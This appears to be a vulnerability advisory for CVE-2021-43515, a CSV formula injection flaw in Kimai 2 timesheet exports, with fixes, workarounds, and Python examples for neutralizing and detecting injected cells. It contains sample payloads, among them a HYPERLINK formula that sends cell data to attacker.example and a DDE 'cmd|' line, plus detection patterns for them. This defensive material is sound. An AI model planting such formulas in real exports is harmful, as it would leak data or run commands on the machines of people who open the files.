CVE-2021-43515

7.8 HIGH

📋 TL;DR

CVE-2021-43515 is a CSV (formula) injection vulnerability in the Kimai 2 time-tracking application: text entered in timesheet fields is written unescaped into exported CSV files. When a user opens such a file in a spreadsheet application such as Excel or LibreOffice Calc, cells that begin with =, +, -, or @ are evaluated as formulas and can fetch external resources, leak spreadsheet contents to an attacker-controlled server, or, via DDE, run commands once the application's security prompts are accepted. Any Kimai 2 installation running code older than the fix commit is affected whenever timesheet data is exported to CSV.

💻 Affected Systems

Products:
  • Kimai
Versions: Kimai 2 versions before commit dad1b8b772947f1596175add1b4f33b791705507
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is in the timesheet export; exploitation requires someone to export the timesheets and open the resulting CSV in a spreadsheet application that evaluates formulas.

📦 What is this software?

Kimai is an open-source, web-based time-tracking application (PHP/Symfony) used by teams and freelancers to record working time per project and customer; timesheets can be exported in several formats, including CSV.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Command execution on the victim's workstation through a DDE-style formula (for example one invoking cmd.exe) when the exported CSV is opened in Excel and the user accepts the external-content warnings, potentially leading to full compromise of that machine, data theft, or ransomware deployment.

🟠

Likely Case

Exfiltration of spreadsheet contents (other users' timesheet rows) through HYPERLINK formulas that embed cell values in a URL the victim clicks, or through import functions in Google Sheets or LibreOffice that fetch an attacker-controlled URL automatically; at minimum the callback reveals who opened the export and when. Macros are not involved; the payload is an ordinary cell formula.

🟢

If Mitigated

Limited impact where users import CSVs as text or use a spreadsheet with DDE and external links disabled, and where Kimai users know that exported cells can contain formulas.

🌐 Internet-Facing: MEDIUM - Requires user interaction (opening CSV file) but can be delivered via web interface exports.
🏢 Internal Only: MEDIUM - Any authenticated user who can enter a timesheet can plant a formula that fires when a manager or administrator exports and opens the CSV.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

The attacker needs an account that can create or edit timesheet entries (any ordinary Kimai user); CSV injection payloads are well documented and trivial to enter in a description field.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Fixed in commit dad1b8b772947f1596175add1b4f33b791705507

Vendor Advisory: https://github.com/kevinpapst/kimai2/commit/dad1b8b772947f1596175add1b4f33b791705507

Restart Required: No

Instructions:

1. Update Kimai to the latest release, or apply commit dad1b8b772947f1596175add1b4f33b791705507
2. Verify that the timesheet CSV export neutralizes cells beginning with =, +, -, @, tab or carriage return
3. No web-server restart is required, but complete the normal Kimai upgrade steps (dependency update, database migration, cache clear) after changing the code

🔧 Temporary Workarounds

Input Sanitization

Applies to: all affected versions

Add server-side validation that rejects, or neutralizes with a leading single quote, any timesheet description (or other free-text field that appears in exports) beginning with =, +, -, @, a tab or a carriage return

Modify the Kimai CSV exporter to apply the same neutralization to every user-controlled cell before writing the file
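The neutralization described in this workaround, as an added example in Python rather than Kimai's PHP (this is not Kimai's code; the timesheet rows, field names and the attacker.example URL are constructed for the example): a pre-fix style export that writes user text straight into the CSV, beside a hardened export that prefixes any cell starting with a formula trigger with a single quote.

```python
# Added example, not Kimai's code: a pre-fix style CSV export next to a
# hardened one. Rows, field names and the attacker.example URL are constructed.
import csv
import io

FIELDS = ["date", "user", "duration", "description"]

# Leading characters that make Excel, LibreOffice Calc and Google Sheets
# evaluate a CSV cell as a formula. Tab and carriage return are included
# because the importers strip them and then look at the next character.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample timesheet rows; the third description is an injected
# HYPERLINK formula of the kind used in the "How to Verify" test.
SAMPLE_ROWS = [
    {"date": "2021-11-08", "user": "alice", "duration": "02:00",
     "description": "Sprint planning"},
    {"date": "2021-11-08", "user": "bob", "duration": "01:30",
     "description": "-1 hour, corrected"},
    {"date": "2021-11-09", "user": "mallory", "duration": "00:15",
     "description": '=HYPERLINK("http://attacker.example/?c="&A1,"timesheet")'},
]


def neutralize_cell(value: str) -> str:
    """Prefix a cell that starts with a formula trigger with a single quote so
    spreadsheet applications import it as text; other values pass through."""
    if value and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_vulnerable(rows):
    """Pre-fix behaviour: user-controlled text goes straight into the file.
    Quoting every field (QUOTE_ALL) does NOT help: Excel strips the
    surrounding quotes and still evaluates a cell that begins with '='."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, quoting=csv.QUOTE_ALL,
                            lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def export_hardened(rows):
    """Same export with every user-controlled field neutralized first
    (all sample values are strings; real exports would str() them first)."""
    safe_rows = [{k: neutralize_cell(v) for k, v in row.items()} for row in rows]
    return export_vulnerable(safe_rows)


def parse_csv(text: str):
    """Read an export back the way a spreadsheet importer sees each cell."""
    return list(csv.DictReader(io.StringIO(text)))


if __name__ == "__main__":
    for label, exporter in (("vulnerable", export_vulnerable),
                            ("hardened", export_hardened)):
        print(f"--- {label} export ---")
        print(exporter(SAMPLE_ROWS))
```

The single-quote prefix is what most spreadsheet applications treat as a text marker, but it may be displayed when the file is opened directly as CSV rather than imported, which is why some deployments prefer a leading tab; either choice stops evaluation. Apply it to every user-controlled column, not only the description.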

Export Format Restriction

Applies to: all affected versions

Disable CSV export or require additional approval before timesheets are exported

Use Kimai's role permissions to restrict timesheet export to trusted users until the fix is deployed

🧯 If You Can't Patch

  • Implement web application firewall rules that block timesheet descriptions beginning with formula characters (expect false positives: a leading hyphen or plus is common in ordinary text, so prefer server-side neutralization where possible)
  • Train users never to open exported CSV files directly in a spreadsheet application; inspect them in a text editor or import them through the spreadsheet's import wizard with the columns typed as Text

🔍 How to Verify

Check if Vulnerable:

Create a timesheet whose description is '=HYPERLINK("http://malicious.com")' and export to CSV. Open the raw file in a text editor first: if the field begins with = and carries no leading single quote or other neutralizer, the export is vulnerable. Opening it in Excel confirms it: a vulnerable export shows a clickable hyperlink instead of the literal text.

Check Version:

Check the Kimai version in the web interface, or in the installation's git checkout confirm that commit dad1b8b772947f1596175add1b4f33b791705507 is part of the deployed revision's history

Verify Fix Applied:

Repeat the test above: in the exported file the formula cell should be neutralized (prefixed with a single quote or otherwise escaped) so that the spreadsheet displays the literal text and creates no link.

📡 Detection & Monitoring

Log Indicators:

  • Multiple CSV exports from a single user in a short period
  • Timesheet descriptions beginning with =, +, -, @ (or with a tab or carriage return followed by one of these). A leading hyphen alone is common in legitimate text; a trigger followed by a function name and parenthesis, such as =HYPERLINK(, or by a DDE pipe is a high-confidence indicator

Network Indicators:

  • Outbound connections from spreadsheet processes (EXCEL.EXE, soffice) to unfamiliar domains shortly after an exported CSV is opened

SIEM Query:

source="kimai" AND (description="=*" OR description="+*" OR description="-*" OR description="@*")

(Splunk-style; the hyphen clause will match many benign entries such as negative corrections and bullet points, so narrow to descriptions that also contain an opening parenthesis or a pipe character, or review hits manually.)
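Added example (not from Kimai or this advisory) that covers both the "Verify Fix Applied" step and the log indicators above: Python that scans timesheet records for descriptions a spreadsheet would evaluate, separating noisy hits (a bare leading hyphen or plus) from high-confidence ones (trigger followed by a function call or a DDE pipe), and that checks an exported CSV file directly so the verification does not depend on opening Excel. The records, the CSV text, the record format and the attacker.example URL are constructed assumptions.

```python
# Added example, not Kimai's code: detect formula injection in stored
# timesheet descriptions and in an exported CSV. Records, CSV text and the
# attacker.example URL are constructed for this example.
import csv
import io
import re

# Any leading formula trigger, after optional tab/CR that importers strip.
# This is the equivalent of the SIEM query above and is just as noisy.
TRIGGER_RE = re.compile(r"^[\t\r]*[=+\-@]")

# Higher confidence: trigger followed by a function call such as HYPERLINK(
# or a DDE pipe such as cmd|. Negative numbers and "-" bullets do not match.
SUSPICIOUS_RE = re.compile(r"^[\t\r]*[=+\-@]\s*(?:[A-Za-z_][\w.]*\s*\(|[A-Za-z]+\s*\|)")

# Constructed records in the shape a log shipper might forward from the
# Kimai database (hypothetical format, not Kimai's own log format).
SAMPLE_RECORDS = [
    {"id": 101, "user": "alice", "description": "Sprint planning"},
    {"id": 102, "user": "bob", "description": "-1 hour, corrected"},
    {"id": 103, "user": "mallory",
     "description": '=HYPERLINK("http://attacker.example/?c="&A1,"timesheet")'},
    {"id": 104, "user": "mallory", "description": "\t=cmd|' /C calc'!A0"},
    {"id": 105, "user": "carol", "description": "@ops sync"},
]

# Constructed CSV exports: the first as a vulnerable Kimai would write it,
# the second with the formula cell neutralized by a leading single quote.
EXPORT_BEFORE_FIX = (
    '"Date","User","Description"\n'
    '"2021-11-09","mallory","=HYPERLINK(""http://attacker.example/?c=""&A1,""timesheet"")"\n'
)
EXPORT_AFTER_FIX = (
    '"Date","User","Description"\n'
    '"2021-11-09","mallory","\'=HYPERLINK(""http://attacker.example/?c=""&A1,""timesheet"")"\n'
)


def classify(text: str) -> str:
    """Return 'high', 'low' or 'none' for a single free-text value."""
    if SUSPICIOUS_RE.match(text):
        return "high"
    if TRIGGER_RE.match(text):
        return "low"
    return "none"


def scan_records(records):
    """Log-indicator check: (id, user, confidence) for every record whose
    description a spreadsheet would evaluate as a formula."""
    hits = []
    for rec in records:
        level = classify(rec["description"])
        if level != "none":
            hits.append((rec["id"], rec["user"], level))
    return hits


def unneutralized_cells(csv_text: str):
    """Fix verification: (row, column, value) for every cell of an exported
    CSV that still begins with a formula trigger. A patched export yields []."""
    reader = csv.reader(io.StringIO(csv_text))
    header = next(reader)
    hits = []
    for row_no, row in enumerate(reader, start=2):  # row 1 is the header
        for column, value in zip(header, row):
            if TRIGGER_RE.match(value):
                hits.append((row_no, column, value))
    return hits


if __name__ == "__main__":
    for rec_id, user, level in scan_records(SAMPLE_RECORDS):
        print(f"timesheet {rec_id} by {user}: {level}")
    print("before fix:", unneutralized_cells(EXPORT_BEFORE_FIX))
    print("after fix: ", unneutralized_cells(EXPORT_AFTER_FIX))
```

Run the CSV check against a real export from your instance after creating the HYPERLINK test entry; an empty result from unneutralized_cells is the same evidence as the spreadsheet showing literal text, without exposing an analyst workstation to the payload.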

🔗 References
